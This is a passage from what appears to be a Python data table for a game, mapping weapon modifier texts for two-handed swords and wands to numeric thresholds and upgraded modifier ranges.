"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Two Hand Sword": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Wand": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Ignite": [(20, '6% chance to Ignite'), (40, '7% chance to Ignite'), (200, '8% chance to Ignite\n(8 - 10)% increased Ignite Duration on Enemies')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Shock": [(20, '6% chance to Shock'), (40, '7% chance to Shock'), (200, '8% chance to Shock\n(8 - 10)% increased Shock Duration on Enemies')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed\n(5 - 6)% increased Cast Speed'), (50, '(3 - 4)% increased Attack Speed\n(7 - 9)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
